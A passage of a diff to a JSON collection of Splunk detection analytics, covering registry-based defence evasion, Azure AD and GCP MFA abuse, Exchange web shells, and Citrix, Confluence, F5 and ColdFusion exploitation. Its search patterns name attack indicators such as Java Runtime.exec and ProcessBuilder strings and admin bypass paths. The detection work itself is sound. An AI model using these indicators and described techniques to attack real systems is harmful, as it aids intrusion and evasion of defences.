Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `etw_registry_disabled_filter`", "tags": { "name": "ETW Registry Disabled", "analytic_story": [ @@ -237108,7 +239145,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "modified/added/deleted registry entry $Registry.registry_path$ in $dest$", + "message": "Modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1562.006", "T1127", @@ -237419,13 +239456,14 @@ { "name": "Hide User Account From Sign-In Screen", "description": "This analytic identifies a suspicious registry modification to hide a user account on the Windows Login screen. This technique was seen in some tradecraft where the adversary will create a hidden user account with Admin privileges in login screen to avoid noticing by the user that they already compromise and to persist on that said machine.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\Userlist*\" AND Registry.registry_value_data = \"0x00000000\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `hide_user_account_from_sign_in_screen_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\Userlist*\" AND Registry.registry_value_data = \"0x00000000\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `hide_user_account_from_sign_in_screen_filter`", "tags": { "name": "Hide User Account From Sign-In Screen", "analytic_story": [ "XMRig", "Windows Registry Abuse", - "Azorult" + "Azorult", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -237908,7 +239946,8 @@ "Remcos", "Windows Defense Evasion Tactics", "Data Destruction", - "WhisperGate" + "WhisperGate", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -238377,14 +240416,15 @@ { "name": "Windows Defender Exclusion Registry Entry", "description": "This analytic will detect a suspicious process that modify a registry related to windows defender exclusion feature. This registry is abused by adversaries, malware author and red teams to bypassed Windows Defender Anti-Virus product by excluding folder path, file path, process, extensions and etc. from its real time or schedule scan to execute their malicious code. This is a good indicator for a defense evasion and to look further for events after this behavior.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\*\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_defender_exclusion_registry_entry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\*\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_defender_exclusion_registry_entry_filter`", "tags": { "name": "Windows Defender Exclusion Registry Entry", "analytic_story": [ "Remcos", "Windows Defense Evasion Tactics", "Azorult", - "Qakbot" + "Qakbot", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -238393,7 +240433,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "exclusion registry $registry_path$ modified or added on $dest$", + "message": "Exclusion registry $registry_path$ modified or added on $dest$ for Windows Defender", "mitre_attack_id": [ "T1562.001", "T1562" @@ -239452,7 +241492,7 @@ { "name": "Windows Powershell Import Applocker Policy", "description": "The following analytic is to identify the imports of Windows PowerShell Applocker commandlets. This technique was seen in Azorult malware where it drops an xml Applocker policy that will deny several AV product and then loaded using PowerShell Applocker commandlet.", - "search": "`powershell` EventCode=4104 ScriptBlockText=\"*Import-Module Applocker*\" ScriptBlockText=\"*Set-AppLockerPolicy *\" ScriptBlockText=\"* -XMLPolicy *\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_import_applocker_policy_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText=\"*Import-Module Applocker*\" ScriptBlockText=\"*Set-AppLockerPolicy *\" ScriptBlockText=\"* -XMLPolicy *\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_import_applocker_policy_filter`", "tags": { "name": "Windows Powershell Import Applocker Policy", "analytic_story": [ @@ -239466,7 +241506,7 @@ "Installation", "Exploitation" ], - "message": "A PowerShell script contains Import Applocker Policy command $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$", + "message": "A PowerShell script contains Import Applocker Policy command $ScriptBlockText$ with EventCode $EventCode$ on host $dest$", "mitre_attack_id": [ "T1059.001", "T1059", @@ -239478,14 +241518,14 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -240969,7 +243009,7 @@ { "name": "Azure Active Directory High Risk Sign-in", "description": "The following analytic triggers on a high risk sign-in against Azure Active Directory identified by Azure Identity Protection. Identity Protection monitors sign-in events using heuristics and machine learning to identify potentially malicious events and categorizes them in three categories high, medium and low.", - "search": " `azuread` body.category=UserRiskEvents body.properties.riskLevel=high | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, activity, riskLevel, riskEventType, additionalInfo | `azure_active_directory_high_risk_sign_in_filter`", + "search": " `azuread` category=UserRiskEvents properties.riskLevel=high | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, activity, riskLevel, riskEventType, additionalInfo | `azure_active_directory_high_risk_sign_in_filter`", "tags": { "name": "Azure Active Directory High Risk Sign-in", "analytic_story": [ @@ -240983,7 +243023,7 @@ "Weaponization", "Exploitation" ], - "message": "A high risk event was identified by Identify Protection for user $body.properties.userPrincipalName$", + "message": "A high risk event was identified by Identify Protection for user $userPrincipalName$", "mitre_attack_id": [ "T1586", "T1586.003", @@ -241073,7 +243113,7 @@ { "name": "Azure AD Authentication Failed During MFA Challenge", "description": "The following analytic identifies an authentication attempt event against an Azure AD tenant that fails during the Multi Factor Authentication challenge. Error Code 500121 represents a failed attempt to authenticate using a second factor. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. ", - "search": " `azuread` body.category=SignInLogs body.properties.status.errorCode=500121 | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, status.additionalDetails, appDisplayName, userAgent | `azure_ad_authentication_failed_during_mfa_challenge_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=500121 | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, status.additionalDetails, appDisplayName, userAgent | `azure_ad_authentication_failed_during_mfa_challenge_filter`", "tags": { "name": "Azure AD Authentication Failed During MFA Challenge", "analytic_story": [ @@ -241089,7 +243129,7 @@ "Delivery", "Installation" ], - "message": "User $body.properties.userPrincipalName$ failed to pass MFA challenge", + "message": "User $userPrincipalName$ failed to pass MFA challenge", "mitre_attack_id": [ "T1586", "T1586.003", @@ -241217,7 +243257,7 @@ { "name": "Azure AD Multi-Factor Authentication Disabled", "description": "The following analytic identifies an attempt to disable multi-factor authentication for an Azure AD user. An adversary who has obtained access to an Azure AD tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users.", - "search": "`azuread` body.category=AuditLogs body.operationName=\"Disable Strong Authentication\" | rename body.properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename targetResources{}.type as type | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) by _time, type, body.operationName, initiatedBy, result | `azure_ad_multi_factor_authentication_disabled_filter`", + "search": "`azuread` category=AuditLogs operationName=\"Disable Strong Authentication\" | rename properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename targetResources{}.type as type | rename initiatedBy.user.userPrincipalName as initiatedBy | stats values(userPrincipalName) as userPrincipalName by _time, type, operationName, initiatedBy, result | `azure_ad_multi_factor_authentication_disabled_filter`", "tags": { "name": "Azure AD Multi-Factor Authentication Disabled", "analytic_story": [ @@ -241306,7 +243346,7 @@ { "name": "Azure AD Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication requests for a single user within an Azure AD tenant. Error Code 500121 represents a failed attempt to authenticate using a second factor. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. Azure AD tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others.", - "search": " `azuread` body.category=SignInLogs body.properties.status.errorCode=500121 | rename body.properties.* as * | bucket span=10m _time | stats dc(_raw) AS mfa_prompts values(userPrincipalName) by userPrincipalName, status.additionalDetails, appDisplayName, userAgent, _time | where mfa_prompts > 10 | `azure_ad_multiple_failed_mfa_requests_for_user_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=500121 | rename properties.* as * | bucket span=10m _time | stats dc(_raw) AS mfa_prompts values(ipAddress) as ipAddress by userPrincipalName, status.additionalDetails, appDisplayName, userAgent, _time | where mfa_prompts > 10 | `azure_ad_multiple_failed_mfa_requests_for_user_filter`", "tags": { "name": "Azure AD Multiple Failed MFA Requests For User", "analytic_story": [ @@ -241322,7 +243362,7 @@ "Delivery", "Installation" ], - "message": "Multiple Failed MFA requests for user $body.properties.userPrincipalName$", + "message": "Multiple Failed MFA requests for user $userPrincipalName$", "mitre_attack_id": [ "T1586", "T1586.003", @@ -241340,13 +243380,6 @@ "role": [ "Victim" ] - }, - { - "name": "ipAddress", - "type": "IP Address", - "role": [ - "Attacker" - ] } ], "risk_score": 54, @@ -241450,7 +243483,7 @@ { "name": "Azure AD Multiple Users Failing To Authenticate From Ip", "description": "The following analytic identifies one source Ip failing to authenticate with 30 unique valid users within 5 minutes. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password. This logic can be used for real time security monitoring as well as threat hunting exercises.\\\nAzure AD tenants can be very different depending on the organization. Users should test this detection and customize the arbitrary threshold if needed.", - "search": " `azuread` body.category= SignInLogs body.properties.status.errorCode=50126 body.properties.authenticationDetails{}.succeeded= false | rename body.properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as tried_accounts by _time, ipAddress | where unique_accounts > 30 | `azure_ad_multiple_users_failing_to_authenticate_from_ip_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as userPrincipalName by _time, ipAddress | where unique_accounts > 30 | `azure_ad_multiple_users_failing_to_authenticate_from_ip_filter`", "tags": { "name": "Azure AD Multiple Users Failing To Authenticate From Ip", "analytic_story": [ @@ -241464,7 +243497,7 @@ "Weaponization", "Exploitation" ], - "message": "Source Ip $body.properties.ipAddress$ failed to authenticate with 30 users within 5 minutes.", + "message": "Source Ip $ipAddress$ failed to authenticate with 30 users within 5 minutes.", "mitre_attack_id": [ "T1586", "T1586.003", @@ -241565,7 +243598,7 @@ { "name": "Azure AD Successful PowerShell Authentication", "description": "The following analytic identifies a successful authentication event against an Azure AD tenant using PowerShell commandlets. This behavior is not common for regular, non administrative users. After compromising an account in Azure AD, attackers and red teams alike will perform enumeration and discovery techniques. One method of executing these techniques is leveraging the native PowerShell modules.", - "search": " `azuread` body.category=SignInLogs body.properties.authenticationDetails{}.succeeded=true body.properties.appDisplayName=\"Azure Active Directory PowerShell\" | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, appDisplayName, userAgent | `azure_ad_successful_powershell_authentication_filter`", + "search": " `azuread` category=SignInLogs properties.authenticationDetails{}.succeeded=true properties.appDisplayName=\"Microsoft Azure PowerShell\" | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, appDisplayName, userAgent | `azure_ad_successful_powershell_authentication_filter`", "tags": { "name": "Azure AD Successful PowerShell Authentication", "analytic_story": [ @@ -241581,7 +243614,7 @@ "Delivery", "Installation" ], - "message": "Successful authentication for user $body.properties.userPrincipalName$ using PowerShell.", + "message": "Successful authentication for user $userPrincipalName$ using PowerShell.", "mitre_attack_id": [ "T1586", "T1586.003", @@ -241697,7 +243730,7 @@ { "name": "Azure AD Successful Single-Factor Authentication", "description": "The following analytic identifies a successful authentication event against Azure Active Directory for an account without Multi-Factor Authentication enabled. This could be evidence of a missconfiguration, a policy violation or an account take over attempt that should be investigated", - "search": " `azuread` body.category=SignInLogs body.properties.authenticationRequirement=singleFactorAuthentication body.properties.authenticationDetails{}.succeeded=true | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, appDisplayName, authenticationRequirement | `azure_ad_successful_single_factor_authentication_filter`", + "search": " `azuread` category=SignInLogs properties.authenticationRequirement=singleFactorAuthentication properties.authenticationDetails{}.succeeded=true | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, appDisplayName, authenticationRequirement | `azure_ad_successful_single_factor_authentication_filter`", "tags": { "name": "Azure AD Successful Single-Factor Authentication", "analytic_story": [ @@ -241713,7 +243746,7 @@ "Delivery", "Installation" ], - "message": "Successful authentication for user $body.properties.userPrincipalName$ without MFA", + "message": "Successful authentication for user $userPrincipalName$ without MFA", "mitre_attack_id": [ "T1586", "T1586.003", @@ -241829,7 +243862,7 @@ { "name": "Azure AD Unusual Number of Failed Authentications From Ip", "description": "The following analytic identifies one source Ip failing to authenticate with multiple valid users. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password.\\\nThe detection calculates the standard deviation for source Ip and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. This logic can be used for real time security monitoring as well as threat hunting exercises.\\\nWhile looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `Azure AD Multiple Users Failing To Authenticate From Ip`.", - "search": " `azuread` body.category=SignInLogs body.properties.status.errorCode=50126 body.properties.authenticationDetails{}.succeeded= false | rename body.properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as tried_accounts by _time, ipAddress | eventstats avg(unique_accounts) as ip_avg , stdev(unique_accounts) as ip_std by ipAddress | eval upperBound=(ip_avg+ip_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1, 0) | where isOutlier = 1 | `azure_ad_unusual_number_of_failed_authentications_from_ip_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as userPrincipalName by _time, ipAddress | eventstats avg(unique_accounts) as ip_avg, stdev(unique_accounts) as ip_std by ipAddress | eval upperBound=(ip_avg+ip_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1,0) | where isOutlier = 1 | `azure_ad_unusual_number_of_failed_authentications_from_ip_filter`", "tags": { "name": "Azure AD Unusual Number of Failed Authentications From Ip", "analytic_story": [ @@ -241843,7 +243876,7 @@ "Weaponization", "Exploitation" ], - "message": "Possible Password Spraying attack against Azure AD from source ip $body.properties.ipAddress$", + "message": "Possible Password Spraying attack against Azure AD from source ip $ipAddress$", "mitre_attack_id": [ "T1586", "T1586.003", @@ -242459,7 +244492,7 @@ { "name": "GCP Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication requests for a single user within a Google Cloud Platform tenant. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 5 minutes. Google CLoud tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others.", - "search": " `gws_reports_login` event.name=login_failure `gws_login_mfa_methods` | bucket span=5m _time | stats dc(_raw) AS mfa_prompts values(user) by src_ip, login_challenge_method, _time | where mfa_prompts >= 10 | `gcp_multiple_failed_mfa_requests_for_user_filter`", + "search": "`gws_reports_login` event.name=login_failure `gws_login_mfa_methods` | bucket span=5m _time | stats dc(_raw) AS mfa_prompts values(user) AS user by src_ip, login_challenge_method, _time | where mfa_prompts >= 10 | `gcp_multiple_failed_mfa_requests_for_user_filter`", "tags": { "name": "GCP Multiple Failed MFA Requests For User", "analytic_story": [ @@ -242495,7 +244528,7 @@ ] }, { - "name": null, + "name": "src_ip", "type": "IP Address", "role": [ "Attacker" @@ -244207,7 +246240,7 @@ { "name": "Detect Exchange Web Shell", "description": "The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell and ProxyNotShell. Paths include: `\\HttpProxy\\owa\\auth\\`, `\\inetpub\\wwwroot\\aspnet_client\\`, and `\\HttpProxy\\OAB\\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=System by _time span=1h Processes.process_id Processes.process_name Processes.dest | `drop_dm_object_name(Processes)` | join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN (\"*\\\\HttpProxy\\\\owa\\\\auth\\\\*\", \"*\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\*\", \"*\\\\HttpProxy\\\\OAB\\\\*\") Filesystem.file_name IN( \"*.aspx\", \"*.ashx\") by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path | `drop_dm_object_name(Filesystem)` | fields _time dest file_create_time file_name file_path process_name process_path process] | dedup file_create_time | table dest file_create_time, file_name, file_path, process_name | `detect_exchange_web_shell_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=System by _time span=1h Processes.process_id Processes.process_name Processes.dest | `drop_dm_object_name(Processes)` | join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN (\"*\\\\HttpProxy\\\\owa\\\\auth\\\\*\", \"*\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\*\", \"*\\\\HttpProxy\\\\OAB\\\\*\") Filesystem.file_name IN( \"*.aspx\", \"*.ashx\") by _time span=1h Filesystem.user Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path | `drop_dm_object_name(Filesystem)` | fields _time dest file_create_time file_name file_path process_name process_path process] | dedup file_create_time | table dest file_create_time, file_name, file_path, process_name | `detect_exchange_web_shell_filter`", "tags": { "name": "Detect Exchange Web Shell", "analytic_story": [ @@ -244572,7 +246605,7 @@ "Delivery", "Installation" ], - "message": "An instance of $process_name$ was identified on endpoint $dest$ writing a jsp file to disk, potentially indicative of exploitation.", + "message": "An instance of $process_name$ was identified on endpoint $dest$ writing a jsp file $file_name$ to disk, potentially indicative of exploitation.", "mitre_attack_id": [ "T1190", "T1133" @@ -244588,13 +246621,6 @@ "Victim" ] }, - { - "name": "parent_process_name", - "type": "Process", - "role": [ - "Parent Process" - ] - }, { "name": "process_name", "type": "Process", @@ -244808,7 +246834,7 @@ "Delivery", "Installation" ], - "message": "An increase of Living Off The Land behavior has been detected on $affected_systems$", + "message": "An increase of Living Off The Land behavior has been detected on $risk_object$", "mitre_attack_id": [ "T1105", "T1190", @@ -244820,7 +246846,7 @@ ], "observable": [ { - "name": "affected_systems", + "name": "risk_object", "type": "Hostname", "role": [ "Victim" @@ -246286,99 +248312,24 @@ } }, { - "name": "Citrix ADC Exploitation CVE-2023-3519", - "description": "This analytic is designed to assist in hunting for potential exploitation attempts against Citrix ADC in relation to CVE-2023-3519. This vulnerability, identified within Citrix ADC and NetScaler Gateway, appears to be linked with SAML processing components, with an overflow issue allowing for possible memory corruption. Preliminary findings indicate that for the exploit to be viable, SAML has to be enabled. The analytic targets POST requests to certain web endpoints which have been associated with the exploitation process. \\\nGiven the specific nature of the vulnerability, upon deploying this analytic it is recommended to filter and narrow the focus towards your ADC assets to reduce potential noise and improve the signal of the analytic. Please note that the exploitation of this vulnerability has been reported in the wild, therefore monitoring for potential signs of exploitation should be considered high priority. \\\nThe search query provided examines web data for POST requests made to specific URLs associated with the exploitation of this vulnerability. It aggregates and presents data to highlight potential exploitation attempts, taking into account elements like user agent, HTTP method, URL length, source, and destination. \\\nPlease be aware that this analytic is based on current understanding of the vulnerability, and adjustments may be required as more information becomes available.", - "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"*/saml/login\",\"/cgi/samlauth\",\"*/saml/activelogin\",\"/cgi/samlart?samlart=*\",\"*/cgi/logout\") Web.http_method=POST by Web.http_user_agent, Web.status Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `citrix_adc_exploitation_cve_2023_3519_filter`", + "name": "Adobe ColdFusion Access Control Bypass", + "description": "The following analytic detects potential exploitation attempts against Adobe ColdFusion vulnerabilities CVE-2023-29298 and CVE-2023-26360. These vulnerabilities pertain to an access control bypass and an arbitrary file read due to deserialization, respectively. By monitoring for requests to specific ColdFusion Administrator endpoints, especially those with an unexpected additional forward slash, the analytic identifies attempts to bypass access controls. Such behavior is crucial for a Security Operations Center (SOC) to identify, as exploitation can grant unauthorized access to ColdFusion administration endpoints, potentially leading to information leakage, brute force attacks, or further exploitation of other vulnerabilities. If a true positive is detected, it indicates a serious security breach where an attacker might have gained privileged access to the ColdFusion environment, potentially leading to data theft or other malicious activities. SOCs must be vigilant in monitoring for these patterns, ensuring timely detection and response to such threats, thus safeguarding the integrity and security of their ColdFusion deployments.", + "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"//restplay*\", \"//CFIDE/restplay*\", \"//CFIDE/administrator*\", \"//CFIDE/adminapi*\", \"//CFIDE/main*\", \"//CFIDE/componentutils*\", \"//CFIDE/wizards*\", \"//CFIDE/servermanager*\",\"/restplay*\", \"/CFIDE/restplay*\", \"/CFIDE/administrator*\", \"/CFIDE/adminapi*\", \"/CFIDE/main*\", \"/CFIDE/componentutils*\", \"/CFIDE/wizards*\", \"/CFIDE/servermanager*\") Web.status=200 by Web.http_user_agent, Web.status, Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `adobe_coldfusion_access_control_bypass_filter`", "tags": { - "name": "Citrix ADC Exploitation CVE-2023-3519", + "name": "Adobe ColdFusion Access Control Bypass", "analytic_story": [ - "Citrix Netscaler ADC CVE-2023-3519" + "Adobe ColdFusion Arbitrary Code Execution CVE-2023-29298 CVE-2023-26360" ], "asset_type": "Network", - "cis20": [ - "CIS 10" - ], - "kill_chain_phases": [ - "Delivery" - ], - "message": "Possible expliotation of CVE-2023-3519 against $dest$.", - "mitre_attack_id": [ - "T1190" - ], - "nist": [ - "DE.AE" - ], - "observable": [ - { - "name": "dest", - "type": "Hostname", - "role": [ - "Victim" - ] - } - ], - "risk_score": 45, - "security_domain": "endpoint", - "risk_severity": "low", - "atomic_guid": [], - "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1190", - "mitre_attack_technique": "Exploit Public-Facing Application", - "mitre_attack_tactics": [ - "Initial Access" - ], - "mitre_attack_groups": [ - "APT28", - "APT29", - "APT39", - "APT41", - "Axiom", - "BackdoorDiplomacy", - "BlackTech", - "Blue Mockingbird", - "Dragonfly", - "Earth Lusca", - "Fox Kitten", - "GALLIUM", - "GOLD SOUTHFIELD", - "HAFNIUM", - "Ke3chang", - "Kimsuky", - "Magic Hound", - "Moses Staff", - "MuddyWater", - "Rocke", - "Threat Group-3390", - "Volatile Cedar", - "menuPass" - ] - } - ] - } - }, - { - "name": "Confluence Unauthenticated Remote Code Execution CVE-2022-26134", - "description": "The following analytic assists with identifying CVE-2022-26134 based exploitation utilizing the Web datamodel to cover network and CIM compliant web logs. The parameters were captured from live scanning and the POC provided by Rapid7. This analytic is written against multiple proof of concept codes released and seen in the wild (scanning). During triage, review any endpoint based logs for further activity including writing a jsp file to disk and commands/processes spawning running as root from the Confluence process.", - "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"*${*\", \"*%2F%7B*\") (Web.url=\"*org.apache.commons.io.IOUtils*\" Web.url=\"*java.lang.Runtime@getRuntime().exec*\") OR (Web.url=\"*java.lang.Runtime%40getRuntime%28%29.exec*\") OR (Web.url=\"*getEngineByName*\" AND Web.url=\"*nashorn*\" AND Web.url=\"*ProcessBuilder*\") by Web.http_user_agent Web.http_method, Web.url,Web.url_length Web.src, Web.dest sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `confluence_unauthenticated_remote_code_execution_cve_2022_26134_filter`", - "tags": { - "name": "Confluence Unauthenticated Remote Code Execution CVE-2022-26134", - "analytic_story": [ - "Atlassian Confluence Server and Data Center CVE-2022-26134" - ], - "asset_type": "Web Server", "cis20": [ "CIS 13" ], "kill_chain_phases": [ - "Installation", "Delivery" ], - "message": "A URL was requested related to CVE-2022-26134, a unauthenticated remote code execution vulnerability, on $dest$ by $src$.", + "message": "Possible exploitation of CVE-2023-29298 against $dest$.", "mitre_attack_id": [ - "T1505", - "T1190", - "T1133" + "T1190" ], "nist": [ "DE.CM" @@ -246386,7 +248337,7 @@ "observable": [ { "name": "dest", - "type": "IP Address", + "type": "Hostname", "role": [ "Victim" ] @@ -246399,18 +248350,11 @@ ] } ], - "risk_score": 100, + "risk_score": 45, "security_domain": "network", - "risk_severity": "high", + "risk_severity": "low", + "atomic_guid": [], "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1505", - "mitre_attack_technique": "Server Software Component", - "mitre_attack_tactics": [ - "Persistence" - ], - "mitre_attack_groups": [] - }, { "mitre_attack_id": "T1190", "mitre_attack_technique": "Exploit Public-Facing Application", @@ -246442,47 +248386,18 @@ "Volatile Cedar", "menuPass" ] - }, - { - "mitre_attack_id": "T1133", - "mitre_attack_technique": "External Remote Services", - "mitre_attack_tactics": [ - "Initial Access", - "Persistence" - ], - "mitre_attack_groups": [ - "APT18", - "APT28", - "APT29", - "APT41", - "Chimera", - "Dragonfly", - "FIN5", - "GALLIUM", - "GOLD SOUTHFIELD", - "Ke3chang", - "Kimsuky", - "LAPSUS$", - "Leviathan", - "OilRig", - "Sandworm Team", - "TEMP.Veles", - "TeamTNT", - "Threat Group-3390", - "Wizard Spider" - ] } ] } }, { - "name": "Detect F5 TMUI RCE CVE-2020-5902", - "description": "This search detects remote code exploit attempts on F5 BIG-IP, BIG-IQ, and Traffix SDC devices", - "search": "`f5_bigip_rogue` | regex _raw=\"(hsqldb;|.*\\\\.\\\\.;.*)\" | search `detect_f5_tmui_rce_cve_2020_5902_filter`", + "name": "Adobe ColdFusion Unauthenticated Arbitrary File Read", + "description": "The following analytic detects potential exploitation of the critical Adobe ColdFusion vulnerability, CVE-2023-26360. This flaw, rooted in the deserialization of untrusted data, enables Unauthenticated Arbitrary File Read. Exploitation often targets specific ColdFusion paths, especially related to CKEditor's file manager. \\\nOur analytic pinpoints exploitation by monitoring web requests to the \"/cf_scripts/scripts/ajax/ckeditor/*\" path. This focus helps differentiate malicious activity from standard ColdFusion traffic. For SOCs, detecting such attempts is vital given the vulnerability's CVSS score of 9.8, signaling its severity. Successful exploitation can lead to unauthorized data access, further attacks, or severe operational disruptions. 